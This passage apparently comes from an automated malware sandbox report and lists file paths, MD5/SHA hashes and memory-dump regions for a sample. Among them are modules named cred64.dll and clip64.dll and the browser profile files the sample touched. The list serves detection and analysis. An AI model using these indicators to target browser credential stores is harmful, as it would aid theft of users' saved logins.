| SHA512 | 9ef6a49f923fb2d27405d4cb5b8658c579dd84547eed6cd75e97930915b74533313c8e77d868db9b52327ad1352fd17b62d0dc967681eefc46680cef411f992c |
memory/6260-527-0x0000000000630000-0x0000000000631000-memory.dmp
memory/3024-603-0x0000000072760000-0x0000000072F10000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | e79dc68986a04e393076666d7ec41d53 |
| SHA1 | fc95f7c3286fad33d1247cca5fad69e1ba580e30 |
| SHA256 | a221e9185f02166c9d88cfe86f3aeb1ae20bf91eb94e8c11acfa3999b5f3d8be |
| SHA512 | 990ce0c8341bdfeb8528f570c7515c9962ac3e0399ab12af0795ba2297b2c157bbee703a85bf0c22b15915a5e0e9d44f384a83493346e0ca6fa7b037898cff65 |
memory/6856-639-0x0000000000400000-0x00000000007C8000-memory.dmp
memory/6856-633-0x0000000000400000-0x00000000007C8000-memory.dmp
memory/6856-632-0x0000000000400000-0x00000000007C8000-memory.dmp
C:\Users\Admin\AppData\Roaming\aca439ae61e801\cred64.dll
| MD5 | 0111e5a2a49918b9c34cbfbf6380f3f3 |
| SHA1 | 81fc519232c0286f5319b35078ac3bb381311bd4 |
| SHA256 | 4643d18bb8be79c2e3178bc3978d201c596ab70a347e8cf1e8fdbe3028d69d7c |
| SHA512 | a2aac32a2c5146dd7287d245bfa9424287bfd12a40825f4da7d18204837242c99d4406428f2361e13c2e4f4d68c385de12e98243cf48bf4c6c5a82273c4467a5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | f084263fbe25993884982a576a5da594 |
| SHA1 | 85d92ff6bfc2d0346c05f2121fa5fa1e088c216e |
| SHA256 | 0beaf9ff633f2e03302e7ffeec7c10afde236077b67ff585cd9414b7b85b2266 |
| SHA512 | ba8a8f5840d6139c93495b5f10d42f766bf1c83efc64c8f777be609c8ee7794fd87f2d541e1658f38ce2815704bdf88a038d434c4ad65b08b700474512c26515 |
C:\Users\Admin\AppData\Local\Temp\771604342093
| MD5 | 91a7a67b5cfcd370d29ae4e95a3b0d54 |
| SHA1 | 78f846a8015749637987003d1f001b44da78cec2 |
| SHA256 | 10ec56d6886f11d0e3b12ec97c8afaeb7c168c7e546919aefa02154a4920f7a7 |
| SHA512 | 106c776865193b08f1b926cf9510f0616459d131080545358da9f730aa5da1547028ea48941a413655f9dfd802558d6c0f70a6e95c705210a3ccf95b7419f4ff |
memory/7072-706-0x0000000000400000-0x00000000007C8000-memory.dmp
C:\Users\Admin\AppData\Roaming\aca439ae61e801\clip64.dll
| MD5 | 8da053f9830880089891b615436ae761 |
| SHA1 | 47d5ed85d9522a08d5df606a8d3c45cb7ddd01f4 |
| SHA256 | d5482b48563a2f1774b473862fbd2a1e5033b4c262eee107ef64588e47e1c374 |
| SHA512 | 69d49817607eced2a16a640eaac5d124aa10f9eeee49c30777c0bc18c9001cd6537c5b675f3a8b40d07e76ec2a0a96e16d1273bfebdce1bf20f80fbd68721b39 |
memory/3024-795-0x0000000005F60000-0x0000000006122000-memory.dmp
memory/3024-802-0x0000000006660000-0x0000000006B8C000-memory.dmp
memory/3024-816-0x0000000005EF0000-0x0000000005F56000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 6f71af181c4a6737c548eac21e23a0f4 |
| SHA1 | eb8a432235f95100ed0e0a61217ea374348b94f9 |
| SHA256 | 7ecb741cd4522de124ff8d3cdd5a96660d5b0611152fb45adf6a6fcf8d67d3b3 |
| SHA512 | b13c6dd2927f357ab69c069e66977a54d260d4d1778fcc7b52b3c235e73be884e96452f1ea1b64a1869d3b0bf546cd8e344df2cb72064e84dd2619566acc2d66 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe588690.TMP
| MD5 | 6285a9709c127776602b71e578154810 |
| SHA1 | 6c7a8580c02334a8906c4d0e6567f9cf5010fefb |
| SHA256 | d3d7bb4ac1094ce8a8b8e8dbdf2a615303b58bcb5bee079190ca561860dcba77 |
| SHA512 | 3c161f58da3559b08c26affe7e40c7eb3b5d4a8acaf1d07db3cf236bd38ad869195946ce3b2255e6d18aa02b6fcd2466ef5a1cd1370617c55ce6807f4500da1e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
| MD5 | d3ac2f74f3c392c1ee8de218acf1ce6a |
| SHA1 | 7def29cdc4e2157d72a9542b4b73019cf3a2ffcb |
| SHA256 | 12f20f6448ddefc7ddd300da591e2299dd533125a6ec8e312a39037206bb276a |
| SHA512 | 55e6239f95b9e7a9a53dec59c4d1d6da1ff13a25d80f8d2983a6c872d614468a89f05fa0615aa30d22a535a4ec3107cf4b8990fa9e2f9f21f3e10661588e29b6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe588865.TMP
| MD5 | c327a16d35ebd19e00e32375a7d2c959 |
| SHA1 | 93283c68c9a5527baf84f7f46c6f3493125d4b79 |
| SHA256 | b72ae4602d5cb36fe4b149fbbff42a722c3a928b97e73dcf645d5d2d48dd3613 |
| SHA512 | 328c9ec35f5a40c74664dd82b085fc580f960271fa13e8b50cd4711925e3eee76fea331f9694397a1f89af1781a74abfdc38a4f3d8064cf7244de4e8bc18b239 |
memory/7072-779-0x0000000000400000-0x00000000007C8000-memory.dmp
memory/3024-678-0x0000000004900000-0x0000000004910000-memory.dmp
memory/7032-848-0x0000000000400000-0x000000000041A000-memory.dmp
memory/5864-890-0x0000000000810000-0x0000000000819000-memory.dmp
memory/5864-891-0x0000000000880000-0x0000000000980000-memory.dmp
memory/6260-893-0x0000000000630000-0x0000000000631000-memory.dmp
memory/1468-894-0x0000000002800000-0x0000000002BFA000-memory.dmp
memory/916-895-0x0000000000400000-0x0000000000409000-memory.dmp
memory/1468-896-0x0000000002D40000-0x000000000362B000-memory.dmp
memory/3024-897-0x00000000063B0000-0x0000000006426000-memory.dmp
memory/916-892-0x0000000000400000-0x0000000000409000-memory.dmp
memory/1468-901-0x0000000000400000-0x0000000000D1B000-memory.dmp
memory/916-920-0x0000000000400000-0x0000000000409000-memory.dmp
memory/3256-919-0x0000000008EB0000-0x0000000008EC6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmpB077.tmp
| MD5 | 02d2c46697e3714e49f46b680b9a6b83 |
| SHA1 | 84f98b56d49f01e9b6b76a4e21accf64fd319140 |
| SHA256 | 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9 |
| SHA512 | 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac |
C:\Users\Admin\AppData\Local\Temp\tmpB0AC.tmp
| MD5 | 2ea428873b09b0b3d94fd89ad2883b02 |
| SHA1 | a767ea985e9a1ff148b90a66297589198b2ed2a0 |
| SHA256 | 0c89f9ffb4f2f7955337b3d94f7712ea0efc71426545018c673caa84a296efba |
| SHA512 | 3a642989b1701f352d4e4167aceaf8f2f536882f2018d80d3d7be4770bda1524a5264e25ab995b87a67b8ea4fb87736641d22264c0d4ba71c550e4ce3bbf3d3a |
C:\Users\Admin\AppData\Local\Temp\tmpB14A.tmp
| MD5 | 364cc7e55e9719eb400badb181770a1e |
| SHA1 | b30996fb66b725830150634bcef3add4498ae7e1 |
| SHA256 | 06ddb155699f1e0f839aeb9add868d81a3879b2d8455da94deaaa806ffe6df22 |
| SHA512 | 3cf9e14405dc18a25e8aef2da0926827afca38992e7461509494e44913b198c4cfcd1debe8a8ba5de34566f3a1eb5a38ce2ef300ffa0f8464b265659d7fd51f4 |
C:\Users\Admin\AppData\Local\Temp\tmpB1BA.tmp